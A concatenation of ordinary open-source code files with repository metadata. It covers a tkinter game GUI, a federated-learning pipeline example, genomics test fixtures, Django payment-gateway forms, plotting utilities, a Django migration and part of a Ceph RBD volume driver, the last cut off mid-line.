self.root.bind("<Return>", lambda x: self.controller.create_order(self.order_var, self.amount_var)())
self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class market(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["n", "<Escape>"]
self.dynamic_entries = []
header = tk.Label(self, text="Market", font=TITLE_FONT)
new_order = tk.Button(self, text="n. New sales line", font=BUTTON_FONT, command=lambda: controller.show_frame("new_transfer"))
self.back = tk.Button(self, text="Back", font=BUTTON_FONT, command=lambda: controller.show_frame("unitData"))
self.main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
header.pack()
new_order.pack(fill=tk.X)
self.back.pack(fill=tk.X)
self.main.pack(fill=tk.X)
def raise_frame(self):
for entry in self.dynamic_entries:
entry.destroy()
char = self.root.getChar()
self.manager = self.controller.get_unit().getJobList()[0]
raw_orders = self.manager.getBusiness().getTransferOrders()
orders = self.cull_wrong_orders(raw_orders)
for order in orders:
newFrame = tk.Frame(self)
newCaption = tk.Label(newFrame, font=BUTTON_FONT, text=d.getMaterials()[order.getProductIndex()] + ":")
amountVar = tk.StringVar()
amountVar.set(order.getAmount())
vcmd = (self.register(self.controller.isInt), '%P')
newEntry = tk.Entry(newFrame, validatecommand=vcmd, validate="key", textvariable=amountVar)
newButton = tk.Button(newFrame, font=BUTTON_FONT, text="Ok", command=self.controller.set_order_amount(order, amountVar))
newCaption.pack(side=tk.LEFT)
newEntry.pack(side=tk.LEFT)
newButton.pack(side=tk.LEFT)
newFrame.pack()
self.dynamic_entries.append(newFrame)
self.back.pack_forget()
self.main.pack_forget()
self.back.pack(fill=tk.X)
self.main.pack(fill=tk.X)
self.set_hotkeys()
self.tkraise()
def cull_wrong_orders(self, orders):
culled_orders = []
for order in orders:
if order.getJob() == self.manager:
culled_orders.append(order)
return culled_orders
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("n", lambda x: self.controller.show_frame("new_transfer"))
# self.root.bind("<BackSpace>", lambda x: self.controller.show_frame("unitData"))
self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class new_transfer(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["<Return>", "<Escape>"]
header = tk.Label(self, text="New Product Line", font=TITLE_FONT)
products = copy.copy(d.getMaterials())
self.order_var = tk.StringVar()
order = tk.OptionMenu(self, self.order_var, *products)
self.amount_var = tk.StringVar()
vcmd = (self.register(self.controller.isInt), '%P')
amount = tk.Entry(self, validatecommand=vcmd, validate="key", textvariable=self.amount_var)
ok = tk.Button(self, text="OK", font=BUTTON_FONT, command=self.controller.create_transfer(self.order_var, self.amount_var))
back = tk.Button(self, text="Back", font=BUTTON_FONT, command=lambda: controller.show_frame("market"))
main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
header.pack()
order.pack()
amount.pack()
ok.pack()
back.pack()
main.pack()
def raise_frame(self):
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
#I don't know why this works
self.root.bind("<Return>", lambda x: self.controller.create_order(self.order_var, self.amount_var)())
self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class house(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["<Escape>"]
header = tk.Label(self, text="Home", font=TITLE_FONT)
main = tk.Button(self, text="(esc) Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
header.pack(fill=tk.X)
main.pack(fill=tk.X)
def raise_frame(self):
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class town(tk.Frame):
def __init__(self, parent, controller, root):
tk.Frame.__init__(self, parent)
self.controller = controller
self.root = root
self.hotkeys = ["<Escape>"]
header = tk.Label(self, text="Town", font=TITLE_FONT)
main = tk.Button(self, text="(esc) Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
header.pack(fill=tk.X)
main.pack(fill=tk.X)
def raise_frame(self):
self.set_hotkeys()
self.tkraise()
def set_hotkeys(self):
for hotkey in self.root.hotkeys:
self.root.unbind(hotkey)
for hotkey in self.root.dynamic_hotkeys:
self.root.unbind(hotkey)
self.root.dynamic_hotkeys = []
self.root.hotkeys = self.hotkeys
self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class quitBar(tk.Frame):
def __init__(self, parent, root, *args, **kwargs):
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = root
exit = tk.Button(self, text="Quit", font=BUTTON_FONT, command=self.quit)
next_turn = tk.Button(self, text="[F1] Next day", font=BUTTON_FONT, command=self.next_day)
self.root.bind("<F1>", self.next_day)
next_turn.pack(fill=tk.X)
exit.pack(fill=tk.X)
def next_day(self, event=None):
char = self.root.getChar()
self.root.text_cont.clear()
char.run_day()
def quit(self):
self.root.quit()
|
{
"content_hash": "a267811e385022f7c11128c003db6fa0",
"timestamp": "",
"source": "github",
"line_count": 1476,
"max_line_length": 147,
"avg_line_length": 33.6890243902439,
"alnum_prop": 0.5939668174962293,
"repo_name": "markemus/economy",
"id": "27c0b6c1857256ba17c4e094893c03714673225e",
"size": "49725",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gui/old_gui.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "298539"
}
],
"symlink_target": ""
}
|
import argparse
from pipeline.backend.pipeline import PipeLine
from pipeline.component import DataTransform
from pipeline.component import Reader
from pipeline.interface import Data
from pipeline.utils.tools import load_job_config
def main(config="../../config.yaml", namespace=""):
# obtain config
if isinstance(config, str):
config = load_job_config(config)
parties = config.parties
guest = parties.guest[0]
host = parties.host[0]
guest_train_data = {"name": "breast_hetero_guest", "namespace": f"experiment{namespace}"}
host_train_data = {"name": "tag_value_1000_140", "namespace": f"experiment{namespace}"}
pipeline = PipeLine().set_initiator(role='guest', party_id=guest).set_roles(guest=guest, host=host)
reader_0 = Reader(name="reader_0")
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
reader_0.get_party_instance(role='host', party_id=host).component_param(table=host_train_data)
data_transform_0 = DataTransform(name="data_transform_0")
data_transform_0.get_party_instance(role='guest', party_id=guest).component_param(with_label=True)
data_transform_0.get_party_instance(role='host', party_id=host).component_param(with_label=False,
input_format="tag",
tag_with_value=True)
pipeline.add_component(reader_0)
pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))
pipeline.compile()
pipeline.fit()
if __name__ == "__main__":
parser = argparse.ArgumentParser("PIPELINE DEMO")
parser.add_argument("-config", type=str,
help="config file")
args = parser.parse_args()
if args.config is not None:
main(args.config)
else:
main()
|
{
"content_hash": "ae982ed71ce432d2081cc81d24beb8a2",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 104,
"avg_line_length": 38.52,
"alnum_prop": 0.6339563862928349,
"repo_name": "FederatedAI/FATE",
"id": "776b3b07cef130376e2a066d235e80c9d4571cd5",
"size": "2543",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/pipeline/data_transform/pipeline-data-transform-tag-value.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "19716"
},
{
"name": "Python",
"bytes": "5121767"
},
{
"name": "Rust",
"bytes": "3971"
},
{
"name": "Shell",
"bytes": "19676"
}
],
"symlink_target": ""
}
|
"""
Helper functions and shared datasets for tests
"""
from __future__ import print_function, division, absolute_import
import os
from varcode import Variant, VariantCollection
from pyensembl import ensembl_grch38
def data_path(name):
"""
Return the absolute path to a file in the varcode/test/data directory.
The name specified should be relative to varcode/test/data.
"""
return os.path.join(os.path.dirname(__file__), "data", name)
# BRAF variant coordinates from COSMIC entry:
# http://cancer.sanger.ac.uk/cosmic/mutation/overview?id=476
braf_V600E_variant = Variant(7, 140753336, "A", "T", ensembl_grch38)
# TP53 variant coordinates from COSMIC entry:
# http://cancer.sanger.ac.uk/cosmic/mutation/overview?id=10656
tp53_R248W_variant = Variant(17, 7674221, "G", "A", ensembl_grch38)
cancer_test_variants = VariantCollection([
braf_V600E_variant,
tp53_R248W_variant
])
cancer_test_variant_gene_ids = {
gene_id
for v in cancer_test_variants
for gene_id in v.gene_ids
}
cancer_test_variant_transcript_ids = {
transcript_id
for v in cancer_test_variants
for transcript_id in v.transcript_ids
}
|
{
"content_hash": "a58f265ccdfb05eeafade57695822307",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 74,
"avg_line_length": 27.523809523809526,
"alnum_prop": 0.7231833910034602,
"repo_name": "hammerlab/topiary",
"id": "d2f9d3fd6034717ea44b56bae635053c0f95d8d2",
"size": "1760",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/data.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "98498"
},
{
"name": "Shell",
"bytes": "154"
}
],
"symlink_target": ""
}
|
from hashlib import md5
from urllib import urlencode
from django import forms
from robokassa.conf import LOGIN, PASSWORD1, PASSWORD2, TEST_MODE
from robokassa.conf import STRICT_CHECK, FORM_TARGET, EXTRA_PARAMS
from robokassa.models import SuccessNotification
class BaseRobokassaForm(forms.Form):
def __init__(self, *args, **kwargs):
super(BaseRobokassaForm, self).__init__(*args, **kwargs)
# создаем дополнительные поля
for key in EXTRA_PARAMS:
self.fields['shp'+key] = forms.CharField(required=False)
if 'initial' in kwargs:
self.fields['shp'+key].initial = kwargs['initial'].get(key, 'None')
def _append_extra_part(self, standard_part, value_func):
extra_part = ":".join(["%s=%s" % ('shp'+key, value_func('shp' + key)) for key in EXTRA_PARAMS])
if extra_part:
return ':'.join([standard_part, extra_part])
return standard_part
def extra_params(self):
extra = {}
for param in EXTRA_PARAMS:
if ('shp'+param) in self.cleaned_data:
extra[param] = self.cleaned_data['shp'+param]
return extra
def _get_signature(self):
return md5(self._get_signature_string()).hexdigest().upper()
def _get_signature_string(self):
raise NotImplementedError
class RobokassaForm(BaseRobokassaForm):
# login магазина в обменном пункте
MrchLogin = forms.CharField(max_length=20, initial = LOGIN)
# требуемая к получению сумма
OutSum = forms.DecimalField(min_value=0, max_digits=20, decimal_places=2, required=False)
# номер счета в магазине (должен быть уникальным для магазина)
InvId = forms.IntegerField(min_value=0, required=False)
# описание покупки
Desc = forms.CharField(max_length=100, required=False)
# контрольная сумма MD5
SignatureValue = forms.CharField(max_length=32)
# предлагаемая валюта платежа
IncCurrLabel = forms.CharField(max_length = 10, required=False)
# e-mail пользователя
Email = forms.CharField(max_length=100, required=False)
# язык общения с клиентом (en или ru)
Culture = forms.CharField(max_length=10, required=False)
# Параметр с URL'ом, на который форма должны быть отправлена.
# Может пригодиться для использования в шаблоне.
target = FORM_TARGET
def __init__(self, *args, **kwargs):
super(RobokassaForm, self).__init__(*args, **kwargs)
if TEST_MODE is True:
self.fields['isTest'] = forms.BooleanField(required=False)
self.fields['isTest'].initial = 1
# скрытый виджет по умолчанию
for field in self.fields:
self.fields[field].widget = forms.HiddenInput()
self.fields['SignatureValue'].initial = self._get_signature()
def get_redirect_url(self):
""" Получить URL с GET-параметрами, соответствующими значениям полей в
форме. Редирект на адрес, возвращаемый этим методом, эквивалентен
ручной отправке формы методом GET.
"""
def _initial(name, field):
val = self.initial.get(name, field.initial)
if not val:
return val
return unicode(val).encode('1251')
fields = [(name, _initial(name, field))
for name, field in self.fields.items()
if _initial(name, field)
]
params = urlencode(fields)
return self.target+'?'+params
def _get_signature_string(self):
def _val(name):
value = self.initial[name] if name in self.initial else self.fields[name].initial
if value is None:
return ''
return unicode(value)
standard_part = ':'.join([_val('MrchLogin'), _val('OutSum'), _val('InvId'), PASSWORD1])
return self._append_extra_part(standard_part, _val)
class ResultURLForm(BaseRobokassaForm):
'''Форма для приема результатов и проверки контрольной суммы '''
OutSum = forms.CharField(max_length=15)
InvId = forms.IntegerField(min_value=0)
SignatureValue = forms.CharField(max_length=32)
def clean(self):
try:
signature = self.cleaned_data['SignatureValue'].upper()
if signature != self._get_signature():
raise forms.ValidationError(u'Ошибка в контрольной сумме')
except KeyError:
raise forms.ValidationError(u'Пришли не все необходимые параметры')
return self.cleaned_data
def _get_signature_string(self):
_val = lambda name: unicode(self.cleaned_data[name])
standard_part = ':'.join([_val('OutSum'), _val('InvId'), PASSWORD2])
return self._append_extra_part(standard_part, _val)
class _RedirectPageForm(ResultURLForm):
'''Форма для проверки контрольной суммы на странице Success'''
Culture = forms.CharField(max_length=10)
def _get_signature_string(self):
_val = lambda name: unicode(self.cleaned_data[name])
standard_part = ':'.join([_val('OutSum'), _val('InvId'), PASSWORD1])
return self._append_extra_part(standard_part, _val)
class SuccessRedirectForm(_RedirectPageForm):
""" Форма для обработки страницы Success с дополнительной защитой. Она
проверяет, что ROBOKASSA предварительно уведомила систему о платеже,
отправив запрос на ResultURL. """
def clean(self):
data = super(SuccessRedirectForm, self).clean()
if STRICT_CHECK:
if not SuccessNotification.objects.filter(InvId=data['InvId']):
raise forms.ValidationError(u'От ROBOKASSA не было предварительного уведомления')
return data
class FailRedirectForm(BaseRobokassaForm):
'''Форма приема результатов для перенаправления на страницу Fail'''
OutSum = forms.CharField(max_length=15)
InvId = forms.IntegerField(min_value=0)
Culture = forms.CharField(max_length=10)
|
{
"content_hash": "f0daaf22f4b7693ea3efaabad61b181c",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 103,
"avg_line_length": 35.96951219512195,
"alnum_prop": 0.6484149855907781,
"repo_name": "kmike/django-robokassa",
"id": "0c1a2841ffb8e29c0470a6411c48e2338ade7fc4",
"size": "6716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "robokassa/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20800"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
from os.path import join
from plottool import draw_func2 as df2
import numpy as np
import os
import utool
print, print_, printDBG, rrr, profile = utool.inject(__name__, '[viz_allres]', DEBUG=False)
# Global variables
BROWSE = True
DUMP = False
FIGNUM = 1
def plot_rank_stem(allres, orgres_type='true'):
print('[viz] plotting rank stem')
# Visualize rankings with the stem plot
ibs = allres.ibs
title = orgres_type + 'rankings stem plot\n' + allres.title_suffix
orgres = allres.__dict__[orgres_type]
df2.figure(fnum=FIGNUM, doclf=True, title=title)
x_data = orgres.qcxs
y_data = orgres.ranks
df2.draw_stems(x_data, y_data)
slice_num = int(np.ceil(np.log10(len(orgres.qcxs))))
df2.set_xticks(ibs.test_sample_cx[::slice_num])
df2.set_xlabel('query chip indeX (qcx)')
df2.set_ylabel('groundtruth chip ranks')
#df2.set_yticks(list(seen_ranks))
__dump_or_browse(allres.ibs, 'rankviz')
def plot_rank_histogram(allres, orgres_type):
print('[viz] plotting %r rank histogram' % orgres_type)
ranks = allres.__dict__[orgres_type].ranks
label = 'P(rank | ' + orgres_type + ' match)'
title = orgres_type + ' match rankings histogram\n' + allres.title_suffix
df2.figure(fnum=FIGNUM, doclf=True, title=title)
df2.draw_histpdf(ranks, label=label) # FIXME
df2.set_xlabel('ground truth ranks')
df2.set_ylabel('frequency')
df2.legend()
__dump_or_browse(allres.ibs, 'rankviz')
def plot_score_pdf(allres, orgres_type, colorx=0.0, variation_truncate=False):
print('[viz] plotting ' + orgres_type + ' score pdf')
title = orgres_type + ' match score frequencies\n' + allres.title_suffix
scores = allres.__dict__[orgres_type].scores
print('[viz] len(scores) = %r ' % (len(scores),))
label = 'P(score | %r)' % orgres_type
df2.figure(fnum=FIGNUM, doclf=True, title=title)
df2.draw_pdf(scores, label=label, colorx=colorx)
if variation_truncate:
df2.variation_trunctate(scores)
#df2.variation_trunctate(false.scores)
df2.set_xlabel('score')
df2.set_ylabel('frequency')
df2.legend()
__dump_or_browse(allres.ibs, 'scoreviz')
def plot_score_matrix(allres):
print('[viz] plotting score matrix')
score_matrix = allres.score_matrix
title = 'Score Matrix\n' + allres.title_suffix
# Find inliers
#inliers = util.find_std_inliers(score_matrix)
#max_inlier = score_matrix[inliers].max()
# Trunate above 255
score_img = np.copy(score_matrix)
#score_img[score_img < 0] = 0
#score_img[score_img > 255] = 255
#dim = 0
#score_img = util.norm_zero_one(score_img, dim=dim)
# Make colors
scores = score_img.flatten()
colors = df2.scores_to_color(scores, logscale=True)
cmap = df2.scores_to_cmap(scores, colors)
df2.figure(fnum=FIGNUM, doclf=True, title=title)
# Show score matrix
df2.imshow(score_img, fnum=FIGNUM, cmap=cmap)
# Colorbar
df2.colorbar(scores, colors)
df2.set_xlabel('database')
df2.set_ylabel('queries')
#__dump_or_browse(allres.ibs, 'scoreviz')
# Dump logic
def __browse():
print('[viz] Browsing Image')
df2.show()
def save_if_requested(ibs, subdir):
if not ibs.args.save_figures:
return
#print('[viz] Dumping Image')
fpath = ibs.dirs.result_dir
if not subdir is None:
subdir = utool.sanitize_fname2(subdir)
fpath = join(fpath, subdir)
utool.ensurepath(fpath)
df2.save_figure(fpath=fpath, usetitle=True)
df2.reset()
def __dump_or_browse(ibs, subdir=None):
#fig = df2.plt.gcf()
#fig.tight_layout()
if BROWSE:
__browse()
if DUMP:
dump(ibs, subdir)
def plot_tt_bt_tf_matches(ibs, allres, qcx):
#print('Visualizing result: ')
#res.printme()
res = allres.qcx2_res[qcx]
ranks = (allres.top_true_qcx_arrays[0][qcx],
allres.bot_true_qcx_arrays[0][qcx],
allres.top_false_qcx_arrays[0][qcx])
#scores = (allres.top_true_qcx_arrays[1][qcx],
#allres.bot_true_qcx_arrays[1][qcx],
#allres.top_false_qcx_arrays[1][qcx])
cxs = (allres.top_true_qcx_arrays[2][qcx],
allres.bot_true_qcx_arrays[2][qcx],
allres.top_false_qcx_arrays[2][qcx])
titles = ('best True rank=' + str(ranks[0]) + ' ',
'worst True rank=' + str(ranks[1]) + ' ',
'best False rank=' + str(ranks[2]) + ' ')
df2.figure(fnum=1, pnum=231)
res.plot_matches(res, ibs, cxs[0], False, fnum=1, pnum=131, title_aug=titles[0])
res.plot_matches(res, ibs, cxs[1], False, fnum=1, pnum=132, title_aug=titles[1])
res.plot_matches(res, ibs, cxs[2], False, fnum=1, pnum=133, title_aug=titles[2])
fig_title = 'fig q' + ibs.cidstr(qcx) + ' TT BT TF -- ' + allres.title_suffix
df2.set_figtitle(fig_title)
#df2.set_figsize(_fn, 1200,675)
def dump_gt_matches(allres):
ibs = allres.ibs
qcx2_res = allres.qcx2_res
'Displays the matches to ground truth for all queries'
for qcx in xrange(0, len(qcx2_res)):
res = qcx2_res[qcx]
res.show_gt_matches(ibs, fnum=FIGNUM)
__dump_or_browse(allres.ibs, 'gt_matches' + allres.title_suffix)
def dump_orgres_matches(allres, orgres_type):
orgres = allres.__dict__[orgres_type]
ibs = allres.ibs
qcx2_res = allres.qcx2_res
# loop over each query / result of interest
for qcx, cx, score, rank in orgres.iter():
query_gname, _ = os.path.splitext(ibs.tables.gx2_gname[ibs.tables.cx2_gx[qcx]])
result_gname, _ = os.path.splitext(ibs.tables.gx2_gname[ibs.tables.cx2_gx[cx]])
res = qcx2_res[qcx]
df2.figure(fnum=FIGNUM, pnum=121)
df2.show_matches3(res, ibs, cx, SV=False, fnum=FIGNUM, pnum=121)
df2.show_matches3(res, ibs, cx, SV=True, fnum=FIGNUM, pnum=122)
big_title = 'score=%.2f_rank=%d_q=%s_r=%s' % (score, rank, query_gname,
result_gname)
df2.set_figtitle(big_title)
__dump_or_browse(allres.ibs, orgres_type + '_matches' + allres.title_suffix)
@profile
def show_descriptors_match_distances(orgres2_distance, fnum=1, db_name='', **kwargs):
disttype_list = orgres2_distance.itervalues().next().keys()
orgtype_list = orgres2_distance.keys()
(nRow, nCol) = len(orgtype_list), len(disttype_list)
nColors = nRow * nCol
color_list = df2.distinct_colors(nColors)
df2.figure(fnum=fnum, docla=True, doclf=True)
pnum_ = lambda px: (nRow, nCol, px + 1)
plot_type = utool.get_arg('--plot-type', default='plot')
# Remember min and max val for each distance type (l1, emd...)
distkey2_min = {distkey: np.uint64(-1) for distkey in disttype_list}
distkey2_max = {distkey: 0 for distkey in disttype_list}
def _distplot(dists, color, label, distkey, plot_type=plot_type):
data = sorted(dists)
ax = df2.gca()
min_ = distkey2_min[distkey]
max_ = distkey2_max[distkey]
if plot_type == 'plot':
df2.plot(data, color=color, label=label, yscale='linear')
#xticks = np.linspace(np.min(data), np.max(data), 3)
#yticks = np.linspace(0, len(data), 5)
#ax.set_xticks(xticks)
#ax.set_yticks(yticks)
ax.set_ylim(min_, max_)
ax.set_xlim(0, len(dists))
ax.set_ylabel('distance')
ax.set_xlabel('matches indexes (sorted by distance)')
df2.legend(loc='lower right')
if plot_type == 'pdf':
df2.plot_pdf(data, color=color, label=label)
ax.set_ylabel('pr')
ax.set_xlabel('distance')
ax.set_xlim(min_, max_)
df2.legend(loc='upper left')
df2.dark_background(ax)
df2.small_xticks(ax)
df2.small_yticks(ax)
px = 0
for orgkey in orgtype_list:
for distkey in disttype_list:
dists = orgres2_distance[orgkey][distkey]
if len(dists) == 0:
continue
min_ = dists.min()
max_ = dists.max()
distkey2_min[distkey] = min(distkey2_min[distkey], min_)
distkey2_max[distkey] = max(distkey2_max[distkey], max_)
for count, orgkey in enumerate(orgtype_list):
for distkey in disttype_list:
printDBG('[allres-viz] plotting: %r' % ((orgkey, distkey),))
dists = orgres2_distance[orgkey][distkey]
df2.figure(fnum=fnum, pnum=pnum_(px))
color = color_list[px]
title = distkey + ' ' + orgkey
label = 'P(%s | %s)' % (distkey, orgkey)
_distplot(dists, color, label, distkey, **kwargs)
if count == 0:
ax = df2.gca()
ax.set_title(distkey)
px += 1
subtitle = 'the matching distances between sift descriptors'
title = '(sift) matching distances'
if db_name != '':
title = db_name + ' ' + title
df2.set_figtitle(title, subtitle)
df2.adjust_subplots_safe()
|
{
"content_hash": "5b3125e5ab52207aea964e4355f21f26",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 91,
"avg_line_length": 37.67634854771784,
"alnum_prop": 0.6105726872246696,
"repo_name": "SU-ECE-17-7/ibeis",
"id": "7f81317d0feba9a3d867246906bee6cf4aee0e7b",
"size": "9093",
"binary": false,
"copies": "1",
"ref": "refs/heads/next",
"path": "_broken/viz_allres.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "331"
},
{
"name": "CSS",
"bytes": "26792"
},
{
"name": "HTML",
"bytes": "33762203"
},
{
"name": "Inno Setup",
"bytes": "1585"
},
{
"name": "JavaScript",
"bytes": "227454"
},
{
"name": "Jupyter Notebook",
"bytes": "66346367"
},
{
"name": "Python",
"bytes": "6112508"
},
{
"name": "Shell",
"bytes": "58211"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('django_chatterbot', '0005_statement_created_at'),
]
operations = [
migrations.CreateModel(
name='Conversation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.AlterField(
model_name='statement',
name='created_at',
field=models.DateTimeField(default=django.utils.timezone.now, help_text='The date and time that this statement was created at.'),
),
migrations.AddField(
model_name='conversation',
name='statements',
field=models.ManyToManyField(help_text=b'The statements in this conversation.', related_name='conversation', to='django_chatterbot.Statement'),
),
]
|
{
"content_hash": "45c2bd39349d54c64da8a1d947de7d57",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 155,
"avg_line_length": 33.645161290322584,
"alnum_prop": 0.6241610738255033,
"repo_name": "davizucon/ChatterBot",
"id": "f468701ea5e30c02996e77daf5a26875eef0422d",
"size": "1113",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "chatterbot/ext/django_chatterbot/migrations/0006_create_conversation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "336866"
}
],
"symlink_target": ""
}
|
import platform
import os
def autodetect():
"""
Returns
-------
bool
True if current platform matches, otherwise False
"""
if 'CI' in os.environ:
if os.environ['CI'] != 'true':
return False
if not 'JENKINS_HOME' in os.environ:
return False
return True
if __name__ == "__main__":
print("Autodetect: "+str(autodetect()))
|
{
"content_hash": "b5d44697b07a852339f17a3f2eb6eec7",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 57,
"avg_line_length": 15.96,
"alnum_prop": 0.543859649122807,
"repo_name": "schreiberx/sweet",
"id": "5a185412fef37544d7ae50b061bad829176ad4ca",
"size": "399",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mule/platforms/10_jenkins/JobPlatformAutodetect.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "133036"
},
{
"name": "C++",
"bytes": "2947985"
},
{
"name": "Fortran",
"bytes": "109460"
},
{
"name": "GLSL",
"bytes": "27428"
},
{
"name": "Makefile",
"bytes": "312"
},
{
"name": "Python",
"bytes": "2503502"
},
{
"name": "Shell",
"bytes": "490940"
},
{
"name": "TeX",
"bytes": "3093"
}
],
"symlink_target": ""
}
|
"""RADOS Block Device Driver"""
from __future__ import absolute_import
import io
import json
import os
import tempfile
import urllib
from oslo.config import cfg
from cinder import exception
from cinder.image import image_utils
from cinder.openstack.common import fileutils
from cinder.openstack.common import log as logging
from cinder import units
from cinder.volume import driver
try:
import rados
import rbd
except ImportError:
rados = None
rbd = None
LOG = logging.getLogger(__name__)
rbd_opts = [
cfg.StrOpt('rbd_pool',
default='rbd',
help='the RADOS pool in which rbd volumes are stored'),
cfg.StrOpt('rbd_user',
default=None,
help='the RADOS client name for accessing rbd volumes '
'- only set when using cephx authentication'),
cfg.StrOpt('rbd_ceph_conf',
default='', # default determined by librados
help='path to the ceph configuration file to use'),
cfg.BoolOpt('rbd_flatten_volume_from_snapshot',
default=False,
help='flatten volumes created from snapshots to remove '
'dependency'),
cfg.StrOpt('rbd_secret_uuid',
default=None,
help='the libvirt uuid of the secret for the rbd_user'
'volumes'),
cfg.StrOpt('volume_tmp_dir',
default=None,
help='where to store temporary image files if the volume '
'driver does not write them directly to the volume'),
cfg.IntOpt('rbd_max_clone_depth',
default=5,
help='maximum number of nested clones that can be taken of a '
'volume before enforcing a flatten prior to next clone. '
'A value of zero disables cloning')]
CONF = cfg.CONF
CONF.register_opts(rbd_opts)
def ascii_str(string):
"""Convert a string to ascii, or return None if the input is None.
This is useful when a parameter is None by default, or a string. LibRBD
only accepts ascii, hence the need for conversion.
"""
if string is None:
return string
return str(string)
class RBDImageMetadata(object):
"""RBD image metadata to be used with RBDImageIOWrapper."""
def __init__(self, image, pool, user, conf):
self.image = image
self.pool = str(pool)
self.user = str(user)
self.conf = str(conf)
class RBDImageIOWrapper(io.RawIOBase):
"""Enables LibRBD.Image objects to be treated as Python IO objects.
Calling unimplemented interfaces will raise IOError.
"""
def __init__(self, rbd_meta):
super(RBDImageIOWrapper, self).__init__()
self._rbd_meta = rbd_meta
self._offset = 0
def _inc_offset(self, length):
self._offset += length
@property
def rbd_image(self):
return self._rbd_meta.image
@property
def rbd_user(self):
return self._rbd_meta.user
@property
def rbd_pool(self):
return self._rbd_meta.pool
@property
def rbd_conf(self):
return self._rbd_meta.conf
def read(self, length=None):
offset = self._offset
total = self._rbd_meta.image.size()
# NOTE(dosaboy): posix files do not barf if you read beyond their
# length (they just return nothing) but rbd images do so we need to
# return empty string if we have reached the end of the image.
if (offset >= total):
return ''
if length is None:
length = total
if (offset + length) > total:
length = total - offset
self._inc_offset(length)
return self._rbd_meta.image.read(int(offset), int(length))
def write(self, data):
self._rbd_meta.image.write(data, self._offset)
self._inc_offset(len(data))
def seekable(self):
return True
def seek(self, offset, whence=0):
if whence == 0:
new_offset = offset
elif whence == 1:
new_offset = self._offset + offset
elif whence == 2:
new_offset = self._rbd_meta.image.size()
new_offset += offset
else:
raise IOError(_("Invalid argument - whence=%s not supported") %
(whence))
if (new_offset < 0):
raise IOError(_("Invalid argument"))
self._offset = new_offset
def tell(self):
return self._offset
def flush(self):
try:
self._rbd_meta.image.flush()
except AttributeError:
LOG.warning(_("flush() not supported in this version of librbd"))
def fileno(self):
"""RBD does not have support for fileno() so we raise IOError.
Raising IOError is recommended way to notify caller that interface is
not supported - see http://docs.python.org/2/library/io.html#io.IOBase
"""
raise IOError(_("fileno() not supported by RBD()"))
# NOTE(dosaboy): if IO object is not closed explicitly, Python auto closes
# it which, if this is not overridden, calls flush() prior to close which
# in this case is unwanted since the rbd image may have been closed prior
# to the autoclean - currently triggering a segfault in librbd.
def close(self):
pass
class RBDVolumeProxy(object):
"""Context manager for dealing with an existing rbd volume.
This handles connecting to rados and opening an ioctx automatically, and
otherwise acts like a librbd Image object.
The underlying librados client and ioctx can be accessed as the attributes
'client' and 'ioctx'.
"""
def __init__(self, driver, name, pool=None, snapshot=None,
read_only=False):
client, ioctx = driver._connect_to_rados(pool)
try:
self.volume = driver.rbd.Image(ioctx, str(name),
